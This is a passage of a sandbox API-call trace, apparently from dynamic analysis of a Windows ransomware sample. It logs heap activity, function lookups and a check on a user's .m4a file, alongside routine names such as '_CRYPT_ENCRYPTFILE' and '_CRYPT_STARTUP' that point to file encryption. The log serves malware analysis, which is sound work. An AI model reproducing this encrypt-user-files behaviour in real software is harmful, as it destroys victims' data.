Size=0x8) returned 0x7af348 [0038.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0038.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0038.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0038.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0038.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0038.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0038.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0038.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0038.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0038.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0038.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0038.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0038.926] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0038.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0038.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0038.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0038.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0038.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0038.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0038.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0038.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0038.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0038.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0038.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0038.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0038.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0038.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0038.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0038.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0038.927] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0038.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0038.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0038.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0038.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c760 [0038.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88c760, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0038.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0038.927] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0038.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0038.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0038.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0038.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0038.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0038.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0038.927] CloseHandle (hObject=0x128) returned 1 [0038.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0038.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0038.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0038.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0038.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0038.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0038.927] FreeLibrary (hLibModule=0x76e10000) returned 1 [0038.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0038.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0038.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0038.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0038.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0038.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0038.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0038.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0038.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0038.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0038.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0038.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0038.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0038.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0038.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0038.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0038.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0038.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0038.928] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0038.928] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0038.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0038.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0038.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0038.929] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0038.929] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0038.929] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.931] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0038.931] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0038.931] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.931] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.931] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.931] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0038.931] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.931] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.931] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.931] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\BT6E6z.m4a", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4623dd80, ftCreationTime.dwHighDateTime=0x1d5ba60, ftLastAccessTime.dwLowDateTime=0xb95244e0, ftLastAccessTime.dwHighDateTime=0x1d5b5f1, ftLastWriteTime.dwLowDateTime=0xb95244e0, ftLastWriteTime.dwHighDateTime=0x1d5b5f1, nFileSizeHigh=0x0, nFileSizeLow=0xec62, dwReserved0=0x0, dwReserved1=0x777648, cFileName="BT6E6z.m4a", cAlternateFileName="")) returned 0x7c20c0 [0038.931] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0038.931] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.931] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\BT6E6z.m4a", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4623dd80, ftCreationTime.dwHighDateTime=0x1d5ba60, ftLastAccessTime.dwLowDateTime=0xb95244e0, ftLastAccessTime.dwHighDateTime=0x1d5b5f1, ftLastWriteTime.dwLowDateTime=0xb95244e0, ftLastWriteTime.dwHighDateTime=0x1d5b5f1, nFileSizeHigh=0x0, nFileSizeLow=0xec62, dwReserved0=0x0, dwReserved1=0x777648, cFileName="BT6E6z.m4a", cAlternateFileName="")) returned 0x7c20c0 [0038.931] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0038.932] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.932] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\BT6E6z.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.932] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\BT6E6z.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.932] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\BT6E6z.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.932] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\BT6E6z.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.932] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\BT6E6z.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.932] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\BT6E6z.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.932] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\BT6E6z.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.932] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\BT6E6z.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.932] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\BT6E6z.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.932] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\BT6E6z.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.932] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\BT6E6z.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.932] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\BT6E6z.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.932] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\BT6E6z.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.932] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\BT6E6z.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.932] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\BT6E6z.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.932] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\BT6E6z.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.932] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\BT6E6z.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.932] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\BT6E6z.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.932] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\BT6E6z.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.932] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\BT6E6z.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.932] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\BT6E6z.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.932] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\BT6E6z.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.932] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\BT6E6z.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.932] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\BT6E6z.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.932] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\BT6E6z.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.932] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Music\\zpoE-x9XwzeBvpPNc\\BT6E6z.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.932] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Music\\zpoE-x9XwzeBvpPNc\\BT6E6z.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.932] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Music\\zpoE-x9XwzeBvpPNc\\BT6E6z.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.932] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Music\\zpoE-x9XwzeBvpPNc\\BT6E6z.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Music\\zpoE-x9XwzeBvpPNc\\BT6E6z.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Music\\zpoE-x9XwzeBvpPNc\\BT6E6z.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Music\\zpoE-x9XwzeBvpPNc\\BT6E6z.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="usic\\zpoE-x9XwzeBvpPNc\\BT6E6z.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sic\\zpoE-x9XwzeBvpPNc\\BT6E6z.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ic\\zpoE-x9XwzeBvpPNc\\BT6E6z.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c\\zpoE-x9XwzeBvpPNc\\BT6E6z.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\zpoE-x9XwzeBvpPNc\\BT6E6z.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zpoE-x9XwzeBvpPNc\\BT6E6z.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="poE-x9XwzeBvpPNc\\BT6E6z.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oE-x9XwzeBvpPNc\\BT6E6z.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E-x9XwzeBvpPNc\\BT6E6z.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-x9XwzeBvpPNc\\BT6E6z.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x9XwzeBvpPNc\\BT6E6z.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9XwzeBvpPNc\\BT6E6z.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XwzeBvpPNc\\BT6E6z.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wzeBvpPNc\\BT6E6z.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zeBvpPNc\\BT6E6z.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eBvpPNc\\BT6E6z.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BvpPNc\\BT6E6z.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vpPNc\\BT6E6z.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pPNc\\BT6E6z.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PNc\\BT6E6z.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Nc\\BT6E6z.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c\\BT6E6z.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BT6E6z.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BT6E6z.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="T6E6z.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6E6z.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.933] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.933] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0038.933] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0038.934] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0038.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0038.934] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0038.934] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0038.934] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0038.934] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0038.934] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.934] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\BT6E6z.m4a", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4623dd80, ftCreationTime.dwHighDateTime=0x1d5ba60, ftLastAccessTime.dwLowDateTime=0xb95244e0, ftLastAccessTime.dwHighDateTime=0x1d5b5f1, ftLastWriteTime.dwLowDateTime=0xb95244e0, ftLastWriteTime.dwHighDateTime=0x1d5b5f1, nFileSizeHigh=0x0, nFileSizeLow=0xec62, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="BT6E6z.m4a", cAlternateFileName="")) returned 0x7c2240 [0038.934] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0038.934] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.934] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0038.934] 